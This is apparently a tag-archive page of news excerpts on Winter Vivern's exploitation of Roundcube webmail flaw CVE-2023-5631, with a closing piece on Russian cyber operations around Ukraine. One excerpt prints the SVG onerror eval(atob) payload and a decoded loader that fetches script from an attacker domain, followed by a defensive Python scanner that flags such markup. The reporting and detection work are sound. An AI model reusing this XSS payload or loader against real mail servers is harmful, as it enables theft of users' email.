Tag Archive for: Winter

Winter Vivern: Zero-Day XSS Exploit Targets Roundcube Servers


ESET Research has discovered a significant cybersecurity threat as the Winter Vivern group exploited a zero-day cross-site scripting (XSS) vulnerability in the Roundcube Webmail server. 

The new campaign, described in an advisory published today, targeted Roundcube Webmail servers of governmental entities and a think tank in Europe. ESET Research promptly reported the vulnerability to the Roundcube team on October 12, and the team acknowledged and patched it within a short timeframe, releasing security updates on October 16.

Winter Vivern, a cyber-espionage group known for targeting governments in Europe and Central Asia, has been active since at least 2020. To infiltrate its targets, the group employs various methods, including malicious documents, phishing websites and a custom PowerShell backdoor. It is suspected of being linked to MoustachedBouncer, a Belarus-aligned group.

Read more about this threat: ESET Unmasks Cyber-Espionage Group Targeting Embassies in Belarus

This is not the first time Winter Vivern has targeted Roundcube servers; in 2022, the group exploited CVE-2020-35730. Sednit, also known as APT28, has been targeting the same vulnerability as well.

The newly exploited XSS vulnerability, CVE-2023-5631, allows remote exploitation by sending a specially crafted email message. Even fully patched Roundcube instances were vulnerable due to a server-side script flaw in rcube_washtml.php, which the attackers exploited.

By sending this email, attackers could inject arbitrary JavaScript code into the victim’s Roundcube session, ultimately enabling them to access and exfiltrate email messages. ESET warned that Winter Vivern’s ability to exploit a zero-day vulnerability in Roundcube represents a concerning development in the realm of cyber-espionage.

“Winter Vivern has stepped up its operations by using a zero-day vulnerability in Roundcube. Previously, it was using known vulnerabilities in Roundcube and Zimbra, for which proofs of concept are available online,” reads the advisory.

“Despite the low sophistication of the group’s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and…


New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail


After reading the technical details about this zero-day that targeted governmental entities and a think tank in Europe and learning about the Winter Vivern threat actor, get tips on mitigating this cybersecurity attack.

ESET researcher Matthieu Faou has exposed a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack focused on exploiting a zero-day vulnerability in Roundcube webmail, with the result being the ability to list folders and emails in Roundcube accounts and exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted the campaign has targeted governmental entities and a think tank in Europe. This cyberattack is no longer active.

Technical details about this cyberattack exploiting a 0day in Roundcube

The threat actor starts the attack by sending a specially crafted email message with the subject line “Get started in your Outlook” and coming from “team.management@outlook(.)com” (Figure A).

Figure A: Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, an SVG tag contains a base64-encoded malicious payload; it is hidden from the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="http://www.bing.com/news/x" xmlns="http://www.w3.org/2000/svg"> <image href="http://www.bing.com/news/x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The purpose of the malicious markup is to trigger the onerror handler: the image points at an invalid URL (the x value), so loading it fails and the browser runs the handler.

Decoding the payload in the onerror attribute results in a line of JavaScript code that will be executed in the victim’s browser in the context of the user’s Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou’s discovery. The researcher could establish that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which failed to “… properly sanitize the malicious SVG…
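As an added example (not ESET’s or Roundcube’s code), the scanner below shows how a mail gateway or hunting script can flag the pattern described above: event-handler attributes inside an SVG in an HTML email body, and an eval(atob(...)) wrapper whose base64 is decoded to reveal the stage-2 script URL. The sample email and the .invalid loader host are constructed for the demonstration.

```python
import base64
import re
from html.parser import HTMLParser
# Constructed sample modelled on the markup described above; the base64 blob
# encodes a hypothetical loader pointing at an .invalid host, not the real one.
PAYLOAD_JS = ("var fe=document.createElement('script');"
              'fe.src="https://loader.example.invalid/checkupdate.js";'
              "document.body.appendChild(fe);")
SAMPLE_EMAIL_HTML = (
    '<html><body><p>Get started in your Outlook</p>'
    '<svg id="x" xmlns="http://www.w3.org/2000/svg">'
    '<image href="x" onerror="eval(atob(\'%s\'))" /></svg></body></html>'
    % base64.b64encode(PAYLOAD_JS.encode()).decode())
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
class HandlerFinder(HTMLParser):
    # Collects on* event-handler attributes and whether they sit inside <svg>.
    def __init__(self):
        super().__init__()
        self.svg_depth, self.findings = 0, []

    def handle_starttag(self, tag, attrs):
        if tag == "svg":
            self.svg_depth += 1
        for name, value in attrs:
            if name.startswith("on") and value:
                self.findings.append((tag, name, value, self.svg_depth > 0))

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth:
            self.svg_depth -= 1

def scan_email_html(html):
    # Flag event handlers in an email body and unwrap eval(atob(...)) payloads
    # so the stage-2 script URL can be blocked or hunted for in proxy logs.
    parser = HandlerFinder()
    parser.feed(html)
    results = []
    for tag, attr, handler, in_svg in parser.findings:
        decoded, urls = None, []
        m = ATOB_RE.search(handler)
        if m:
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
                urls = URL_RE.findall(decoded)
            except ValueError:
                pass  # not valid base64; still report the raw handler
        results.append({"tag": tag, "attr": attr, "handler": handler,
                        "in_svg": in_svg, "decoded": decoded, "urls": urls})
    return results
```

Any on* attribute in an email body is worth flagging regardless of whether it sits inside an SVG; the in_svg field only records which case matched.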


Winter Vivern APT Blasts Webmail Zero-Day Bug With One-Click Exploit


Low-profile threat group Winter Vivern has been exploiting a zero-day flaw in Roundcube Webmail servers through a malicious email campaign, targeting governmental organizations and a think tank in Europe, that requires only that a user view a message.

Earlier this month, researchers at ESET Research observed the group sending a specially crafted email message that loads an arbitrary JavaScript code in the context of the Roundcube user’s browser window to exploit a newly discovered cross-site scripting (XSS) flaw tracked as CVE-2023-5631. The one-click exploit requires no manual interaction on the part of the user other than viewing the message in a Web browser, the researchers reported in a blog post published Oct. 25.

Roundcube is a freely available, open source webmail solution that’s especially popular with small-to-midsize organizations. The flaw affects versions before 1.4.15, 1.5.x before 1.5.5, and 1.6.x before 1.6.4, and allows for stored XSS via an HTML email message with a crafted SVG document due to the behavior of “program/lib/Roundcube/rcube_washtml.php,” according to its CVE listing. This, in turn, allows a remote attacker to load arbitrary JavaScript code.

ESET Research reported the vulnerability to the Roundcube team on Oct. 12 and received a response and patch from the company two days later on Oct. 14. On Oct. 16, Roundcube released security updates with new versions 1.6.4, 1.5.5, and 1.4.15 to address the flaw.

Long-Term Targeting

Winter Vivern’s activity is often underreported by security researchers but the group has been active since at least December 2020 and shows sympathies with Russia and Belarus, conducting cyber espionage that serves the interest of those nations. The group typically uses malicious documents, phishing websites, and a custom PowerShell backdoor to compromise its targets and may be linked to a sophisticated Belarus-aligned group MoustachedBouncer.

The latest activity observed by ESET, which has been tracking Winter Vivern closely for about a year, is consistent with the group’s typical methods, though previously the group exploited flaws that were already public, notes ESET researcher Matthieu Faou.

“Since at least 2022, they have been exploiting XSS…


Preparing for a Russian cyber offensive against Ukraine this winter


As we report more fully below, in the wake of Russian battlefield losses to Ukraine this fall, Moscow has intensified its multi-pronged hybrid technology approach to pressure the sources of Kyiv’s military and political support, domestic and foreign. This approach has included destructive missile and cyber strikes on civilian infrastructure in Ukraine, cyberattacks on Ukrainian and now foreign-based supply chains, and cyber-enabled influence operations[1]—intended to undermine US, EU, and NATO political support for Ukraine, and to shake the confidence and determination of Ukrainian citizens.

In recent months, cyber threat actors affiliated with Russian military intelligence have launched destructive wiper attacks against energy, water, and other critical infrastructure organizations’ networks in Ukraine as missile strikes knocked out power and water supplies to civilians across the country. Russian military operators also expanded destructive cyberactivity outside Ukraine to Poland, a critical logistics hub, in a possible attempt to disrupt the movement of weapons and supplies to the front.

Meanwhile, Russian propaganda seeks to amplify the intensity of popular dissent over energy and inflation across Europe by boosting select narratives online through state-affiliated media outlets and social media accounts to undermine elected officials and democratic institutions. To date these have had only limited public impact, but they foreshadow what may become broadening tactics during the winter ahead.

We believe these recent trends suggest that the world should be prepared for several lines of potential Russian attack in the digital domain over the course of this winter. First, we can expect a continuation of Russia’s cyber offensive against Ukrainian critical infrastructure. We should also be prepared for the possibility that Russian military intelligence actors’ recent execution of a ransomware-style attack—known as Prestige—in Poland may be a harbinger of Russia further extending cyberattacks beyond the borders of Ukraine. Such cyber operations may target those countries and companies that are providing Ukraine with vital supply chains of aid and weaponry this…
